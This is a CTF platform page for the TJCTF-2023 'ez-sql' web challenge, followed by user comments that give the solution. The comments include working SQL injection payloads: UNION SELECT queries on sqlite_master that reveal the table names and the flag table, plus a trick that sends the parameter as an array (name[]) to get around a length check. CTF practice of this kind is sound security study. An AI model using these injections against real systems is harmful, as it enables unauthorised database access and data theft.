列表

详情

ez-sql

TJCTF-2023   WEB  

题目作者: 未知

一  血: ‌‌‌‌‌xht0525

一血奖励: 0金币

解  决: 13

提  示:

描  述:

just your average sql challenge, nothing else to see here (trust)

附  件: 下载

去做题

不要不要 @ 2024-05-07 23:23:43 👍0

bp抓包,URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句,知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+

justsosoloveyou @ 2023-11-07 23:23:43 👍0

关键是用name[]=,绕过name.length的长度限制。如:/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器,但是name=[1,2],name.length=2。

xht0525 @ 2023-10-07 23:23:43 👍1

name[]=changzifuchuan' union select name,name from sqlite_master--

© 2024 ctf.bugku.com